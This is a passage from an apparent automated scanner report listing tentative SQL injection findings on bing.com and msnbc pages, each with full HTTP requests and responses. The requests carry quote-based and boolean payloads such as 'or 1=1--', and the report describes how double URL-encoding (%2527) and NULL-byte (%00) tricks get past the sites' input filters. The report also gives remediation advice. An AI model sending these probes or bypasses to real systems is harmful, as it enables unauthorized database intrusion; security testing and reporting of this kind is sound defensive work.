Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:00:06 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:00:07 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406806; domain=.bing.com; path=/
Set-Cookie: _SS=SID=498134C0118345E48632264F8094F86E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:06 GMT; domain=.bing.com; path=/


1.104. http://www.bing.com/videos/results.aspx [SRCHUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The SRCHUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7%2527; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16345
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:44 GMT
Connection: close
Set-Cookie: _SS=SID=4318D78D50E640FC90E674B1FECFA468; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7%2527%2527; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 16:59:45 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406784; domain=.bing.com; path=/
Set-Cookie: _SS=SID=AB9D2F7799B041FC95AE8BD0B5721088; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:44 GMT; domain=.bing.com; path=/


1.105. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16351
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:41 GMT
Connection: close
Set-Cookie: _SS=SID=9FA0FC98356248F88888BE6CE70BE8C9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c651eca1da172486cba0944037f5dcdd6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345161; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C8F0CB274FED4F89A1536BA080934C88; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/


1.106. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /videos/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16366
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:37 GMT
Connection: close
Set-Cookie: _SS=SID=8E0BAB48DE2E4E1287AF061964E47F83; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c69f8e53a62694ce680e4efd439e85e51; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /videos/results.aspx?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse?q=
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:00:37 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296406837; domain=.bing.com; path=/
Set-Cookie: _SS=SID=92066549463145E090C30ADACCA54068; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/


1.107. http://www.msnbc.redacted/id/21134540/vp/41328239 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/21134540/vp/41328239

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19689523%20or%201%3d1--%20 and 19689523%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/21134540/vp/4132823919689523%20or%201%3d1--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 03:09:17 GMT
Date: Sun, 30 Jan 2011 03:09:17 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;
margin: 0 auto;
width: 995px;
}
#fb_frame {position:relative; top:5px; margin-right:3px;}
#vid_hed {font-size:12px;font-weight:bold; padding:0px 10px;margin-top:2px;}
#fb_reco {margin-right:0px; float:right;}
#fb_like {float:left;margin:6px 15px 0;}
#fb_sig, #fb_site {position:relative;top:-2px;}
#fb_site {margin-left:2px; top:4px; float:left;}
</style>


</head>


<body bgcolor="000000" style="margin:0px;text-align: center; color:#DDD">
<script>s_account="msnbcom";</script>
<script language=javascript src="http://www.msnbc.msn.com/js/std.js"></script>
<script language=javascript src="http://www.msnbc.msn.com/js/s_code.js"></script>

<div class="player_fb">
<div id="fb_header">
<span id="fb_like">
<span id="fb_site">msnbc.com:</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
</span>

<span id="fb_reco">
<span id="vid_hed">Video on MSNBC</span>
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe></span>
</span>
</span>


</div>
</div></div>
<div style="position:relative;top:0px;overflow:hidden;height:600;width:996;margin-left: auto;margin-right: auto;margin-top:-1px;"><div id=VpFlash style="position:re
...[SNIP]...

Request 2

GET /id/21134540/vp/4132823919689523%20or%201%3d2--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sun, 30 Jan 2011 03:09:17 GMT
Date: Sun, 30 Jan 2011 03:09:17 GMT
Content-Length: 4181
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296356957=new Image();
req_108_1296356957.src='/__ssobj/ard.png?5567810734358587645_1_0-108-'+(19738*65678+4593);
//-->
<!-- // --></script>
<title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;
margin: 0 auto;
width: 995px;
}
#fb_frame {position:relative; top:5px; margin-right:3px;}
#vid_hed {font-size:12px;font-weight:bold; padding:0px 10px;margin-top:2px;}
#fb_reco {margin-right:0px; float:right;}
#fb_like {float:left;margin:6px 15px 0;}
#fb_sig, #fb_site {position:relative;top:-2px;}
#fb_site {margin-left:2px; top:4px; float:left;}
</style>


</head>


<body bgcolor="000000" style="margin:0px;text-align: center; color:#DDD">
<script>s_account="msnbcom";</script>
<script language=javascript src="http://www.msnbc.msn.com/js/std.js"></script>
<script language=javascript src="http://www.msnbc.msn.com/js/s_code.js"></script>

<div class="player_fb">
<div id="fb_header">
<span id="fb_like">
<span id="fb_site">msnbc.com:</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
</span>

<span id="fb_reco">
<span id="vid_hed">Video on MSNBC</span>
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe><
...[SNIP]...

1.108. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/24780215/ns/technology_and_science-games

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /id/24780215%00'/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"
...[SNIP]...
<h2>Bad Request - Invalid URL</h2>
...[SNIP]...

Request 2

GET /id/24780215%00''/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 03:10:15 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /id/24780215%00''/ns/technology_and_science-games was
...[SNIP]...

1.109. http://www.msnbc.redacted/id/37643077 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/37643077

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/37643077'%20and%201%3d1--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:59:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111210


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>Welcome to our new story pages - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/37643077" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets4b.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1b.msnbc.redacted/re
...[SNIP]...

Request 2

GET /id/37643077'%20and%201%3d2--%20 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:59:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:129150931 -->
<title>Welcome to our new story pages - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/37643077" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets2d.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1d.msnbc.redacted/rend
...[SNIP]...

1.110. http://www.msnbc.redacted/id/37643077 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/37643077

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/37643077?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:08:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111209


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847506 -->
<title>Welcome to our new story pages - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
